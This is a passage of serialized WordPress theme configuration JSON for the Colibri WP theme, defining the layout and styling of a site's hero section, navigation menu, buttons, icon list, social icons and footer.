0.4)\",\"position\":\"100\"}],\"name\":\"october_silence\"},\"shape\":{\"value\":\"none\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"color\":{\"opacity\":0.4,\"value\":\"#000000\",\"opacity_\":40},\"light\":false},\"image\":[{\"source\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/header-scaled.jpg\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]}},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"color\":\"#03a9f4\",\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/www.youtube.com\\/watch?v=coYirc_qoSA\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"}},\"separatorBottom\":{\"enabled\":false,\"type\":\"mountains\",\"color\":\"#FFF\",\"height\":{\"value\":100},\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textOnly\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"v\":\"1.1\",\"nodes\":[\"7-h25\"]},{\"id\":25,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h26\"]},{\"id\":26,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\"},\"bottom\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\"}},\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"v\":\"1.1\",\"nodes\":[\"7-h27\"]},{\"id\":27,\"props\":{\"headerType\":\"1\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"7-h28\"],\"style\":{\"typography\":{\"weight\":\"600\"},\"textAlign\":\"center\"}},{\"id\":28,\"props\":{\"type\":\"lead\"},\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"7-h29\"]},{\"id\":29,\"type\":\"hop-button-group\",\"v\":\"1.1\",\"nodes\":[\"7-h30\"]},{\"id\":30,\"style\":{\"background\":{\"color\":\"${theme.colors.0}\",\"type\":\"none\",\"image\":[{\"source\":{\"type\":\"gradient\",\"gradient\":{\"angle\":\"0\",\"steps\":[{\"color\":\"#00c6fb\",\"position\":\"0\"},{\"color\":\"#005bea\",\"position\":\"100\"}]}}}]},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h31\"]},{\"id\":31,\"style\":{\"background\":{\"color\":\"transparent\"},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(255, 255, 255, 0.25)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.4}\"},\"left\":{\"color\":\"${theme.colors.4}\"},\"right\":{\"color\":\"${theme.colors.4}\"},\"bottom\":{\"color\":\"${theme.colors.4}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h32\"]},{\"id\":32,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"7-h35\",\"nodes\":[\"7-h33\"],\"v\":\"1.1\"},{\"id\":33,\"type\":\"hop-image\",\"nodeId\":\"7-h36\",\"nodes\":[\"7-h34\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"overlay\":{\"background\":{\"overlay\":{\"enabled\":false}}}}},\"props\":{\"enabledFrameOption\":true}},{\"id\":34,\"type\":\"hop-header\",\"nodeId\":\"4443-h1\",\"v\":\"1.1\",\"nodes\":[\"10-h1\"]},{\"id\":35,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"10-h2\"],\"nodeId\":\"10-h2\"},{\"id\":36,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\"]},{\"id\":37,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h4\"],\"nodeId\":\"10-h4\"},{\"id\":38,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"10-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}},\"nodeId\":\"10-h5\"},{\"id\":39,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"10-h6\",\"v\":\"1.1\",\"nodes\":[\"10-h6\"]},{\"id\":40,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\"]},{\"id\":41,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h8\"],\"nodeId\":\"10-h8\"},{\"id\":42,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"10-h9\"],\"nodeId\":\"10-h9\"},{\"id\":43,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\"]},{\"id\":44,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\"]},{\"id\":45,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\"]},{\"id\":46,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\"]},{\"id\":47,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":48,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\"]},{\"id\":49,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\"]},{\"id\":50,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\"]},{\"id\":51,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\"]},{\"id\":52,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\"]},{\"id\":53,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\"]},{\"id\":54,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\"]},{\"id\":55,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\"]},{\"id\":56,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\"]},{\"id\":57,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"none\",\"color\":\"${theme.colors.0}\",\"overlay\":{\"shape\":{\"value\":\"none\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"light\":false,\"color\":{\"value\":\"#000000\",\"opacity\":0,\"opacity_\":0},\"enabled\":true,\"type\":\"color\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"rgba(183,33,255, 0)\"},{\"position\":\"100\",\"color\":\"rgba(33,212,253, 0)\"}]}},\"image\":[{\"source\":{\"url\":\"\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]}},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/www.youtube.com\\/watch?v=coYirc_qoSA\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"50\"},\"bottom\":{\"unit\":\"px\",\"value\":\"50\"}},\"separatorBottom\":{\"type\":\"mountains\",\"color\":\"#FFF\",\"height\":{\"value\":100},\"enabled\":false,\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textWithMediaOnRight\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"nodeId\":\"10-h29\",\"nodes\":[\"10-h25\"],\"v\":\"1.1\"},{\"id\":58,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"10-h37\",\"nodes\":[\"10-h26\"],\"v\":\"1.1\"},{\"id\":59,\"type\":\"hop-column\",\"nodeId\":\"10-h38\",\"nodes\":[\"10-h27\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}},{\"id\":60,\"type\":\"hop-page-title\",\"nodeId\":\"10-h39\",\"nodes\":[\"10-h28\"],\"v\":\"1.1\"},{\"id\":61,\"type\":\"hop-footer\",\"props\":{\"useFooterParallax\":true},\"v\":\"1.1\",\"nodes\":[\"13-f1\"]},{\"id\":62,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"30\"},\"bottom\":{\"path\":\"value\",\"value\":\"30\"}}},\"v\":\"1.1\",\"nodes\":[\"13-f2\"]},{\"id\":63,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":1,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"13-f3\"]},{\"id\":64,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":1,\"verticalInnerGap\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"13-f4\"]},{\"id\":65,\"type\":\"hop-copyright\",\"nodeId\":\"13-f6\",\"v\":\"1.1\",\"nodes\":[\"13-f5\"]},{\"id\":66,\"type\":\"hop-main\",\"nodeId\":\"71-m1\",\"v\":\"1.1\",\"nodes\":[\"432-m1\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"40\",\"y\":\"10\",\"spread\":\"0\",\"color\":\"rgba(1, 51, 74, 